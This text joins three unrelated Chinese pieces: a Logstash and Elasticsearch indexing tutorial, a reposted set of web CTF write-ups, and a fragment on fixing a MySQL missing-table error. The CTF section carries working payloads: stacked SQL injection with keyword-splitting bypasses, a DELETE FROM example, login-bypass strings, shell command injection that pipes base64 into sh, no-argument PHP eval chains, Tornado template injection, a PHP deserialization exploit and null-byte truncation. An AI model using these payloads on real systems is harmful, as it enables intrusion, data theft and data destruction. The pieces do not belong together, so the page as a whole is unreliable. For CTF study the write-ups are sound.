...csearch：实时数据处理的黄金搭档 嘿，朋友们！今天我要带大家走进一个非常有趣的技术领域——Logstash与Elasticsearch的结合。这俩在大数据处理界可是响当当的角色，特别是在实时索引优化这块，简直绝了！想象一下，你正面对着一大堆日志数据，每天都得迅速搞定它们的分析和查找，这时候，Logstash加上Elasticsearch简直就是你的超级英雄搭档，简直不要太好用！ 1.1 什么是Logstash？ Logstash 是一个开源的数据收集引擎，它能够从多个来源采集数据，然后进行转换，最后输出到各种存储系统中。它的设计初衷就是用来处理日志和事件数据的，但其实它的能力远不止于此。这家伙挺能来事儿的，不仅能搞定各种输入插件——比如文件啊、网页数据啊、数据库啥的，还能用过滤插件整点儿花样，比如说正则表达式匹配或者修改字段之类的。最后，它还支持不少输出插件，比如往Elasticsearch或者Kafka里面扔数据，简直不要太方便！这种灵活性使得Logstash成为了处理复杂数据流的理想选择。 1.2 Elasticsearch：实时搜索与分析的利器 Elasticsearch 是一个基于Lucene构建的开源分布式搜索引擎，它提供了强大的全文搜索功能，同时也支持结构化搜索、数值搜索以及地理空间搜索等多种搜索类型。此外，Elasticsearch还拥有出色的实时分析能力，这得益于其独特的倒排索引机制。当你将数据导入Elasticsearch后，它会自动对数据进行索引，从而大大提高了查询速度。 2. 实时索引优化 让数据飞起来 现在我们已经了解了Logstash和Elasticsearch各自的特点，接下来就让我们看看如何通过它们来实现高效的实时索引优化吧！ 2.1 数据采集与预处理 首先，我们需要利用Logstash从各种数据源采集数据。好嘞，咱们换个说法：比如说，我们要从服务器的日志里挖出点儿有用的东西，就像找宝藏一样，目标就是那些访问时间、用户ID和请求的网址这些信息。我们可以用Filebeat这个工具来读取日志文件，然后再用Grok这个插件来解析这些数据，让信息变得更清晰易懂。下面是一个具体的配置示例： yaml input { file { path => "/var/log/nginx/access.log" start_position => "beginning" } } filter { grok { match => { "message" => "%{COMBINEDAPACHELOG}" } } } 这段配置告诉Logstash，从/var/log/nginx/access.log这个路径下的日志文件开始读取，并使用Grok插件中的COMBINEDAPACHELOG模式来解析每一行日志内容。这样子一来，原始的文本信息就被拆成了一个个有组织的小块儿，给接下来的处理铺平了道路，简直不要太方便！ 2.2 高效索引策略 一旦数据被Logstash处理完毕，下一步就是将其导入Elasticsearch。为了确保索引操作尽可能高效，我们可以采取一些策略： - 批量处理：减少网络往返次数，提高吞吐量。 - 动态映射：允许Elasticsearch根据文档内容自动创建字段类型，简化索引管理。 - 分片与副本：合理设置分片数量和副本数量，平衡查询性能与集群稳定性。 下面是一个简单的Logstash输出配置示例，演示了如何将处理后的数据批量发送给Elasticsearch： yaml output { elasticsearch { hosts => ["localhost:9200"] index => "nginx-access-%{+YYYY.MM.dd}" document_type => "_doc" user => "elastic" password => "changeme" manage_template => false template => "/path/to/template.json" template_name => "nginx-access" template_overwrite => true flush_size => 5000 idle_flush_time => 1 } } 在这段配置中，我们设置了批量大小为5000条记录，以及空闲时间阈值为1秒，这意味着当达到这两个条件之一时，Logstash就会将缓冲区内的数据一次性发送至Elasticsearch。此外，我还指定了自定义的索引模板，以便更好地控制字段映射规则。 3. 实战案例 打造高性能日志分析平台 好了，理论讲得差不多了，接下来让我们通过一个实际的例子来看看这一切是如何运作的吧！ 假设你是一家电商网站的运维工程师，最近你们网站频繁出现访问异常的问题，客户投诉不断。为了找出问题根源，你需要对Nginx服务器的日志进行深入分析。幸运的是，你们已经部署了Logstash和Elasticsearch作为日志处理系统。 3.1 日志采集与预处理 首先，我们需要确保Logstash能够正确地从Nginx服务器上采集到所有相关的日志信息。根据上面说的设置，我们可以搞一个Logstash配置文件，用来从特定的日志文件里扒拉出重要的信息。嘿，为了让大家看日志的时候能更轻松明了，我们可以加点小技巧，比如说统计每个用户逛网站的频率，或者找出那些怪怪的访问模式啥的。这样一来，信息就一目了然啦！ 3.2 索引优化与查询分析 接下来，我们将这些处理后的数据发送给Elasticsearch进行索引存储。有了合适的索引设置，就算同时来一大堆请求，我们的查询也能嗖嗖地快，不会拖泥带水的。比如说，在上面那个输出配置的例子里面，我们调高了批量处理的门槛，同时把空闲时间设得比较短，这样就能大大加快数据写入的速度啦！ 一旦数据被成功索引，我们就可以利用Elasticsearch的强大查询功能来进行深度分析了。比如说，你可以写个DSL查询，找出最近一周内访问量最大的10个页面；或者，你还可以通过用户ID捞出某个用户的操作记录，看看能不能从中发现问题。 4. 结语 拥抱变化，不断探索 通过以上介绍，相信大家已经对如何使用Logstash与Elasticsearch实现高效的实时索引优化有了一个全面的认识。当然啦，技术这东西总是日新月异的，所以我们得保持一颗好奇的心，不停地学新技术，这样才能更好地迎接未来的各种挑战嘛！ 希望这篇文章能对你有所帮助，如果你有任何疑问或建议，欢迎随时留言交流。让我们一起加油，共同成长！

...!! 那么如何查询到数据呢？ select 函数被过滤了，其实mysql的函数有很多 这里通过 MYSQL的预处理语句，使用 : concat（'s','elect',' from 1919810931114514'） 完成绕过 构造pyload： 1';PREPARE test from concat('s','elect',' from 1919810931114514');EXECUTE test; flag{3b3d8fa2-2348-4d6b-81af-017ca90e6c81} [SUCTF 2019]EasySQL 环境我已经启动了 进入题目链接 老套路 先看看源码里面有什么东西 不出意料的什么都没有 但是提示我们它是POST传参 这是一道SQL注入的题目 不管输入什么数字，字母 都是这的 没有回显 但是输入:0没有回显 不知道为啥 而且输入:1' 也不报错 同样是没有回显 尝试注入时 显示Nonono. 也就是说，没有回显，联合查询基本没戏。 好在页面会进行相应的变化，证明注入漏洞肯定是有的。 而且注入点就是这个POST参数框 看了大佬的WP 才想起来 还有堆叠注入 堆叠注入原理 在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。例如以下这个例子。用户输入：1; DELETE FROM products服务器端生成的sql语句为：（因未对输入的参数进行过滤）Select from products where productid=1;DELETE FROM products当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。 1;show databases; 1;show tables; 1;use ctf;show tables; 跑字典时 发现了好多的过滤 哭了 没有办法… 看到上面主要是有两中返回，一种是空白，一种是nonono。 在网上查writeup看到 输入1显示:Array ( [0] => 1 )输入a显示:空白输入所有非0数字都显示:Array ( [0] => 1 )输入所有字母（除过滤的关键词外）都显示空白 可以推测题目应该是用了||符号。 推测出题目应该是select $_post[value] || flag from Flag。 这里 就有一个符号|| 当有一边为数字时 运算结果都为 true 返回1 使用 || 运算符，不在是做或运算 而是作为拼接字符串的作用 在oracle 缺省支持 通过 || 来实现字符串拼接，但在mysql 缺省不支持 需要调整mysql 的sql_mode 模式：pipes_as_concat 来实现oracle 的一些功能。 这个意思是在oracle中 || 是作为字符串拼接，而在mysql中是运算符。 当设置sql_mode为pipes_as_concat的时候，mysql也可以把 || 作为字符串拼接。 修改完后，|| 就会被认为是字符串拼接符 MySQL中sql_mode参数，具体的看这里 解题思路1： payload：,1 查询语句：select ,1||flag from Flag 解题思路2： 堆叠注入，使得sql_mode的值为PIPES_AS_CONCAT payload:1;set sql_mode=PIPES_AS_CONCAT;select 1 解析： 在oracle 缺省支持 通过 ‘ || ’ 来实现字符串拼接。但在mysql 缺省不支持。需要调整mysql 的sql_mode模式：pipes_as_concat 来实现oracle 的一些功能。 flag出来了 头秃 不是很懂 看了好多的wp… [GYCTF2020]Blacklist 进入题目链接 1.注入：1’ 为'闭合 2.看字段：1' order by 2 确认字段为2 3.查看回显:1’ union select 1,2 发现过滤字符 与上面的随便注很像 ，太像了，增加了过滤规则。 修改表名和set均不可用，所以很直接的想到了handler语句。 4.但依旧可以用堆叠注入获取数据库名称、表名、字段。 1';show databases 获取数据库名称1';show tables 获取表名1';show columns from FlagHere ; 或 1';desc FlagHere; 获取字段名 5.接下来用 handler语句读取内容。 1';handler FlagHere open;handler FlagHere read first 直接得到 flag 成功解题。 flag{d0c147ad-1d03-4698-a71c-4fcda3060f17} 补充handler语句相关。 mysql除可使用select查询表中的数据，也可使用handler语句 这条语句使我们能够一行一行的浏览一个表中的数据，不过handler语句并不 具备select语句的所有功能。它是mysql专用的语句,并没有包含到SQL标准中 [GKCTF2020]cve版签到 查看提示 菜鸡的第一步 提示了：cve-2020-7066 赶紧去查了一下 cve-2020-7066PHP 7.2.29之前的7.2.x版本、7.3.16之前的7.3.x版本和7.4.4之前的7.4.x版本中的‘get_headers()’函数存在安全漏洞。攻击者可利用该漏洞造成信息泄露。 描述在低于7.2.29的PHP版本7.2.x，低于7.3.16的7.3.x和低于7.4.4的7.4.x中，将get_headers（）与用户提供的URL一起使用时，如果URL包含零（\ 0）字符，则URL将被静默地截断。这可能会导致某些软件对get_headers（）的目标做出错误的假设，并可能将某些信息发送到错误的服务器。 利用方法 总的来说也就是get_headers()可以被%00截断 进入题目链接 知识点： cve-2020-7066利用 老套路：先F12查看源码 发现提示：Flag in localhost 根据以上 直接上了 直接截断 因为提示host必须以123结尾，这个简单 所以需要将localhost替换为127.0.0.123 成功得到flag flag{bf1243d2-08dd-44ee-afe8-45f58e2d6801} GXYCTF2019禁止套娃 考点： .git源码泄露 无参RCE localeconv() 函数返回一包含本地数字及货币格式信息的数组。scandir() 列出 images 目录中的文件和目录。readfile() 输出一个文件。current() 返回数组中的当前单元, 默认取第一个值。pos() current() 的别名。next() 函数将内部指针指向数组中的下一个元素，并输出。array_reverse()以相反的元素顺序返回数组。highlight_file()打印输出或者返回 filename 文件中语法高亮版本的代码。 具体细节，看这里 进入题目链接 上御剑扫目录 发现是.git源码泄露 上githack补全源码 得到源码 <?phpinclude "flag.php";echo "flag在哪里呢？<br>";if(isset($_GET['exp'])){if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {if (!preg_match('/et|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {// echo $_GET['exp'];@eval($_GET['exp']);}else{die("还差一点哦！");} }else{die("再好好想想！");} }else{die("还想读flag，臭弟弟！");} }// highlight_file(__FILE__);?> 既然getshell基本不可能，那么考虑读源码 看源码，flag应该就在flag.php 我们想办法读取 首先需要得到当前目录下的文件 scandir()函数可以扫描当前目录下的文件，例如： <?phpprint_r(scandir('.'));?> 那么问题就是如何构造scandir('.') 这里再看函数： localeconv() 函数返回一包含本地数字及货币格式信息的数组。而数组第一项就是. current() 返回数组中的当前单元, 默认取第一个值。 pos() current() 的别名。 这里还有一个知识点： current(localeconv())永远都是个点 那么就很简单了 print_r(scandir(current(localeconv())));print_r(scandir(pos(localeconv()))); 第二步：读取flag所在的数组 之后我们利用array_reverse() 将数组内容反转一下，利用next()指向flag.php文件==>highlight_file()高亮输出 payload: ?exp=show_source(next(array_reverse(scandir(pos(localeconv()))))); [De1CTF 2019]SSRF Me 首先得到提示 还有源码 进入题目链接 得到一串py 经过整理后 ! /usr/bin/env pythonencoding=utf-8from flask import Flaskfrom flask import requestimport socketimport hashlibimport urllibimport sysimport osimport jsonreload(sys)sys.setdefaultencoding('latin1')app = Flask(__name__)secert_key = os.urandom(16)class Task:def __init__(self, action, param, sign, ip):python得构造方法self.action = actionself.param = paramself.sign = signself.sandbox = md5(ip)if(not os.path.exists(self.sandbox)): SandBox For Remote_Addros.mkdir(self.sandbox)def Exec(self):定义的命令执行函数，此处调用了scan这个自定义的函数result = {}result['code'] = 500if (self.checkSign()):if "scan" in self.action:action要写scantmpfile = open("./%s/result.txt" % self.sandbox, 'w')resp = scan(self.param) 此处是文件读取得注入点if (resp == "Connection Timeout"):result['data'] = respelse:print resp 输出结果tmpfile.write(resp)tmpfile.close()result['code'] = 200if "read" in self.action:action要加readf = open("./%s/result.txt" % self.sandbox, 'r')result['code'] = 200result['data'] = f.read()if result['code'] == 500:result['data'] = "Action Error"else:result['code'] = 500result['msg'] = "Sign Error"return resultdef checkSign(self):if (getSign(self.action, self.param) == self.sign): !!!校验return Trueelse:return Falsegenerate Sign For Action Scan.@app.route("/geneSign", methods=['GET', 'POST']) !!!这个路由用于测试def geneSign():param = urllib.unquote(request.args.get("param", "")) action = "scan"return getSign(action, param)@app.route('/De1ta',methods=['GET','POST'])这个路由是我萌得最终注入点def challenge():action = urllib.unquote(request.cookies.get("action"))param = urllib.unquote(request.args.get("param", ""))sign = urllib.unquote(request.cookies.get("sign"))ip = request.remote_addrif(waf(param)):return "No Hacker!!!!"task = Task(action, param, sign, ip)return json.dumps(task.Exec())@app.route('/')根目录路由，就是显示源代码得地方def index():return open("code.txt","r").read()def scan(param):这是用来扫目录得函数socket.setdefaulttimeout(1)try:return urllib.urlopen(param).read()[:50]except:return "Connection Timeout"def getSign(action, param):!!!这个应该是本题关键点,此处注意顺序先是param后是actionreturn hashlib.md5(secert_key + param + action).hexdigest()def md5(content):return hashlib.md5(content).hexdigest()def waf(param):这个waf比较没用好像check=param.strip().lower()if check.startswith("gopher") or check.startswith("file"):return Trueelse:return Falseif __name__ == '__main__':app.debug = Falseapp.run(host='0.0.0.0') 相关函数 作用 init(self, action, param, …) 构造方法self代表对象,其他是对象的属性 request.args.get(param) 提取get方法传入的，参数名叫param对应得值 request.cookies.get(“action”) 提取cookie信息中的，名为action得对应值 hashlib.md5().hexdigest() hashlib.md5()获取一个md5加密算法对象，hexdigest()是获得加密后的16进制字符串 urllib.unquote(） 将url编码解码 urllib.urlopen() 读取网络文件参数可以是url json.dumps Python 对象编码成 JSON 字符串 这个题先放一下… [极客大挑战 2019]EasySQL 进入题目链接 直接上万能密码 用户随意 admin1' or 1; 得到flag flag{7fc65eb6-985b-494a-8225-de3101a78e89} [极客大挑战 2019]Havefun 进入题目链接 老套路 去F12看看有什么东西 很好 逮住了 获取FLAG的条件是cat=dog，且是get传参 flag就出来了 flag{779b8bac-2d64-4540-b830-1972d70a2db9} [极客大挑战 2019]Secret File 进入题目链接 老套路 先F12查看 发现超链接 直接逮住 既然已经查阅结束了 中间就肯定有一些我们不知道的东西 过去了 上burp看看情况 我们让他挺住 逮住了：secr3t.php 访问一下 简单的绕过 就可以了 成功得到一串字符 进行base解密即可 成功逮住flag flag{ed90509e-d2d1-4161-ae99-74cd27d90ed7} [ACTF2020 新生赛]Include 根据题目信息 是文件包含无疑了 直接点击进来 用php伪协议 绕过就可以了 得到一串编码 base64解密即可 得到flag flag{c09e6921-0c0e-487e-87c9-0937708a78d7} 2018]easy_tornado 都点击一遍 康康 直接filename变量改为：fllllllllllllag 报错了 有提示 render() 是一个渲染函数 具体看这里 就用到SSTI模板注入了 具体看这里 尝试模板注入： /error?msg={ {1} } 发现存在模板注入 md5(cookie_secret+md5(filename)) 分析题目： 1.tornado是一个python的模板，可能会产生SSTI注入漏洞2.flag在/fllllllllllllag中3.render是python中的一个渲染函数，也就是一种模板，通过调用的参数不同，生成不同的网页4.可以推断出filehash的值为md5(cookie_secret+md5(filename)) 根据目前信息，想要得到flag就需要获取cookie_secret 因为tornado存在模版注入漏洞，尝试通过此漏洞获取到所需内容 根据测试页面修改msg得值发现返回值 可以通过msg的值进行修改,而在 taornado框架中存在cookie_secreat 可以通过/error?msg={ {handler.settings} }拿到secreat_cookie 综合以上结果 拿脚本跑一下 得到filehash: ed75a45308da42d3fe98a8f15a2ad36a 一直跑不出来 不知道为啥子 [极客大挑战 2019]LoveSQL 万能密码尝试 直接上万能密码 用户随意 admin1' or 1; 开始正常注入： 查字段：1' order by 3 经过测试 字段为3 查看回显:1’ union select 1,2,3 查数据库 1' union select 1,2,group_concat(schema_name) from information_schema.schemata 查表： [GXYCTF2019]Ping Ping Ping 考察：RCE的防护绕过 直接构造：?ip=127.0.0.1;ls 简单的fuzz一下 就发现=和$没有过滤 所以想到的思路就是使用$IFS$9代替空格，使用拼接变量来拼接出Flag字符串： 构造playload ?ip=127.0.0.1;a=fl;b=ag;cat$IFS$9$a$b 看看他到底过滤了什么：?ip=127.0.0.1;cat$IFS$1index.php 一目了然过滤了啥，flag字眼也过滤了，bash也没了，不过sh没过滤： 继续构造payload： ?ip=127.0.0.1;echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh 查看源码，得到flag flag{1fe312b4-96a0-492d-9b97-040c7e333c1a} [RoarCTF 2019]Easy Calc 进入题目链接 查看源码 发现calc.php 利用PHP的字符串解析特性Bypass，具体看这里 HP需要将所有参数转换为有效的变量名，因此在解析查询字符串时，它会做两件事： 1.删除空白符2.将某些字符转换为下划线（包括空格） scandir()：列出参数目录中的文件和目录 发现/被过滤了 ，可以用chr('47')代替 calc.php? num=1;var_dump(scandir(chr(47))) 这里直接上playload calc.php? num=1;var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103))) flag{76243df6-aecb-4dc5-879e-3964ec7485ee} [极客大挑战 2019]Knife 进入题目链接 根据题目Knife 还有这个一句话木马 猜想尝试用蚁剑连接 测试连接成功 确实是白给了flag [ACTF2020 新生赛]Exec 直接ping 发现有回显 构造playload： 127.0.0.1;cat /flag 成功拿下flag flag{7e582f16-2676-42fa-8b9d-f9d7584096a6} [极客大挑战 2019]PHP 进入题目链接 它提到了备份文件 就肯定是扫目录 把源文件的代码 搞出来 上dirsearch 下载看这里 很简单的使用方法 用来扫目录 -u 指定url -e 指定网站语言 -w 可以加上自己的字典，要带路径 -r 递归跑(查到一个目录后，重复跑) 打开index.php文件 分析这段内容 1.加载了一个class.php文件 2.采用get方式传递一个select参数 3.随后将之反序列化 打开class.php <?phpinclude 'flag.php';error_reporting(0);class Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = 'guest';}function __destruct(){if ($this->password != 100) {echo "</br>NO!!!hacker!!!</br>";echo "You name is: ";echo $this->username;echo "</br>";echo "You password is: ";echo $this->password;echo "</br>";die();}if ($this->username === 'admin') {global $flag;echo $flag;}else{echo "</br>hello my friend~~</br>sorry i can't give you the flag!";die();} }}?> 根据代码的意思可以知道，如果password=100，username=admin 在执行_destruct()的时候可以获得flag 构造序列化 <?phpclass Name{private $username = 'nonono';private $password = 'yesyes';public function __construct($username,$password){$this->username = $username;$this->password = $password;} }$a = new Name('admin', 100);var_dump(serialize($a));?> 得到了序列化 O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 但是 还有要求 1.跳过__wakeup()函数 在反序列化字符串时，属性个数的值大于实际属性个数时，就可以 2.private修饰符的问题 private 声明的字段为私有字段，只在所声明的类中可见，在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化时，类名和字段名前面都会加上\0的前缀。字符串长度也包括所加前缀的长度 构造最终的playload ?select=O:4:%22Name%22:3:{s:14:%22%00Name%00username%22;s:5:%22admin%22;s:14:%22%00Name%00password%22;i:100;} [极客大挑战 2019]Http 进入题目链接 查看 源码 发现了 超链接的标签 说我们不是从https://www.Sycsecret.com访问的 进入http://node3.buuoj.cn:27883/Secret.php 抓包修改一下Referer 执行一下 随后提示我们浏览器需要使用Syclover， 修改一下User-Agent的内容 就拿到flag了 [HCTF 2018]admin 进入题目链接 这道题有三种解法 1.flask session 伪造 2.unicode欺骗 3.条件竞争 发现 登录和注册功能 随意注册一个账号啦 登录进来之后 登录 之后 查看源码 发现提示 猜测 我们登录 admin账号 即可看见flag 在change password页面发现 访问后 取得源码 第一种方法： flask session 伪造 具体，看这里 flask中session是存储在客户端cookie中的，也就是存储在本地。flask仅仅对数据进行了签名。众所周知的是，签名的作用是防篡改，而无法防止被读取。而flask并没有提供加密操作，所以其session的全部内容都是可以在客户端读取的，这就可能造成一些安全问题。 [极客大挑战 2019]BabySQL 进入题目链接 对用户名进行测试 发现有一些关键字被过滤掉了 猜测后端使用replace()函数过滤 11' oorr 1=1 直接尝试双写 万能密码尝试 双写 可以绕过 查看回显： 1' uniunionon selselectect 1,2,3 over！正常 开始注入 爆库 爆列 爆表 爆内容 本篇文章为转载内容。原文链接：https://blog.csdn.net/wo41ge/article/details/109162753。 该文由互联网用户投稿提供，文中观点代表作者本人意见，并不代表本站的立场。 作为信息平台，本站仅提供文章转载服务，并不拥有其所有权，也不对文章内容的真实性、准确性和合法性承担责任。 如发现本文存在侵权、违法、违规或事实不符的情况，请及时联系我们，我们将第一时间进行核实并删除相应内容。

...个问题，反馈你不存在数据库表，可能是由于以下缘由： 问题信息：Table 'database_name.table_name' doesn't exist. 问题缘由可能是： 1. 表空间名称输入问题。请核实您输入的表空间名称是否准确。 比方说，输入“my_database”而不是“myDataBase”。 2. 数据表名问题。请核实您输入的数据表名是否准确。 比方说，输入“user”而不是“users”。 3. 您没有许可查阅该数据库表。请核实您是否有查阅该表所需的许可。 4. 数据库表已被删除。请核实您输入的表名是否准确，或者您的表是否已被删除。 5. 数据库连接故障。请核实您的MySQL连接是否正常工作。 比方说，您的MySQL服务器是否正常工作，或者您是否使用了准确的用户名和密码。 解决方法： 1. 确认表空间名称和表名称是否准确。 2. 确认您是否具有查阅该数据库表的许可。 3. 如果表已经被删除，请尝试恢复表或使用备份复制该表。 4. 确认MySQL连接是否正常。 如果您还是无法解决问题，请联系MySQL管理员或开发人员进行支持。